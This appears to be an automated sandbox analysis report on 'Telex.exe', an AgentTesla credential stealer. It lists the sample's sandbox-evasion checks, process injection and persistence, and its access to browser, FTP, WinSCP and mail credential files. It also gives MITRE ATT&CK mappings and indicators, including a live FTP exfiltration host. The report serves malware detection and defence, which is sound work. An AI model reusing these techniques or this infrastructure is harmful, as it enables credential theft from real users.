Source: C:\Users\user\Desktop\Telex.exe TID: 6356	Thread sleep time: -101782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe TID: 6384	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe TID: 6860	Thread sleep time: -23058430092136925s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe TID: 6868	Thread sleep count: 4116 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe TID: 6868	Thread sleep count: 5686 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe TID: 2200	Thread sleep time: -101582s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe TID: 6156	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe TID: 6984	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe TID: 6672	Thread sleep count: 9320 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe TID: 6984	Thread sleep count: 53 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe TID: 6672	Thread sleep count: 485 > 30	Jump to behavior

Source: C:\Users\user\Desktop\Telex.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Telex.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\Telex.exe	Thread delayed: delay time: 101782	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Thread delayed: delay time: 101582	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: Telex.exe, 00000001.00000002.508483412.00000000064A8000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Telex.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Telex.exe

Code function: 1_2_010E4988 LdrInitializeThunk,

1_2_010E4988

Source: C:\Users\user\Desktop\Telex.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Telex.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\Telex.exe	Memory written: C:\Users\user\Desktop\Telex.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Memory written: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\Telex.exe	Process created: C:\Users\user\Desktop\Telex.exe C:\Users\user\Desktop\Telex.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process created: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process created: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Process created: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Jump to behavior

Source: Telex.exe, 00000001.00000002.501770752.0000000001580000.00000002.00000001.sdmp, mDPTQJF1.exe, 00000012.00000002.501298071.0000000001AF0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: Telex.exe, 00000001.00000002.501770752.0000000001580000.00000002.00000001.sdmp, mDPTQJF1.exe, 00000012.00000002.501298071.0000000001AF0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: Telex.exe, 00000001.00000002.501770752.0000000001580000.00000002.00000001.sdmp, mDPTQJF1.exe, 00000012.00000002.501298071.0000000001AF0000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: Telex.exe, 00000001.00000002.501770752.0000000001580000.00000002.00000001.sdmp, mDPTQJF1.exe, 00000012.00000002.501298071.0000000001AF0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: Telex.exe, 00000001.00000002.501770752.0000000001580000.00000002.00000001.sdmp, mDPTQJF1.exe, 00000012.00000002.501298071.0000000001AF0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Telex.exe	Queries volume information: C:\Users\user\Desktop\Telex.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Queries volume information: C:\Users\user\Desktop\Telex.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Queries volume information: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Queries volume information: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Queries volume information: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Telex.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000000.00000002.239739509.0000000003869000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.496113093.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.496219146.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.322963471.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 18.2.mDPTQJF1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.mDPTQJF1.exe.376ab38.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Telex.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Telex.exe.391ab38.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.mDPTQJF1.exe.376ab38.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Telex.exe.391ab38.4.raw.unpack, type: UNPACKEDPE

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000000.00000002.239739509.0000000003869000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.496113093.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.502487076.0000000002B81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.496219146.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.502933000.0000000002C03000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.502771261.0000000002BCE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.322963471.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Telex.exe PID: 6424, type: MEMORY
Source: Yara match	File source: Process Memory Space: Telex.exe PID: 6352, type: MEMORY
Source: Yara match	File source: Process Memory Space: mDPTQJF1.exe PID: 5920, type: MEMORY
Source: Yara match	File source: Process Memory Space: mDPTQJF1.exe PID: 4652, type: MEMORY
Source: Yara match	File source: 18.2.mDPTQJF1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.mDPTQJF1.exe.376ab38.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Telex.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Telex.exe.391ab38.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.mDPTQJF1.exe.376ab38.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Telex.exe.391ab38.4.raw.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\Telex.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\Telex.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\Desktop\Telex.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\Desktop\Telex.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\Desktop\Telex.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.502487076.0000000002B81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Telex.exe PID: 6424, type: MEMORY
Source: Yara match	File source: Process Memory Space: mDPTQJF1.exe PID: 5920, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000000.00000002.239739509.0000000003869000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.496113093.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.496219146.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.322963471.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 18.2.mDPTQJF1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.mDPTQJF1.exe.376ab38.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Telex.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Telex.exe.391ab38.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.mDPTQJF1.exe.376ab38.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Telex.exe.391ab38.4.raw.unpack, type: UNPACKEDPE

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000000.00000002.239739509.0000000003869000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.496113093.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.502487076.0000000002B81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.496219146.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.502933000.0000000002C03000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.502771261.0000000002BCE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.322963471.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Telex.exe PID: 6424, type: MEMORY
Source: Yara match	File source: Process Memory Space: Telex.exe PID: 6352, type: MEMORY
Source: Yara match	File source: Process Memory Space: mDPTQJF1.exe PID: 5920, type: MEMORY
Source: Yara match	File source: Process Memory Space: mDPTQJF1.exe PID: 4652, type: MEMORY
Source: Yara match	File source: 18.2.mDPTQJF1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.mDPTQJF1.exe.376ab38.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Telex.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Telex.exe.391ab38.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.mDPTQJF1.exe.376ab38.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Telex.exe.391ab38.4.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	Registry Run Keys / Startup Folder1	Process Injection112	Disable or Modify Tools1	OS Credential Dumping2	System Information Discovery114	Remote Services	Archive Collected Data11	Exfiltration Over Alternative Protocol1	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter2	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder1	Deobfuscate/Decode Files or Information1	Input Capture21	Query Registry1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information3	Credentials in Registry1	Security Software Discovery311	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Application Layer Protocol11	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing3	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture21	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Virtualization/Sandbox Evasion131	SSH	Clipboard Data1	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion131	Cached Domain Credentials	Application Window Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection112	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Hidden Files and Directories1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Telex.exe	26%	Virustotal		Browse
Telex.exe	28%	ReversingLabs	Win32.Trojan.Wacatac

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe	26%	ReversingLabs	Win32.Trojan.Wacatac

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
18.2.mDPTQJF1.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8		Download File
1.2.Telex.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8		Download File

Domains

Source	Detection	Scanner	Label	Link
ftp.universalinks.net	10%	Virustotal		Browse
api.globalsign.cloud	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://FvPNfC.com	0%	Avira URL Cloud	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
https://srFPkrrHbWMI0Yhx6.net	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.org%GETMozilla/5.0	0%	URL Reputation	safe
https://srFPkrrHbWMI0Yhx6.netX	0%	Avira URL Cloud	safe
http://ftp.universalinks.net	0%	Avira URL Cloud	safe
https://api.ipify.org%	0%	URL Reputation	safe
https://api.ipify.org%	0%	URL Reputation	safe
https://api.ipify.org%	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
ftp://ftp.universalinks.net/bring4	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ftp.universalinks.net	192.145.239.54	true	true	10%, Virustotal, Browse	unknown
api.globalsign.cloud	104.18.24.243	true	false	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
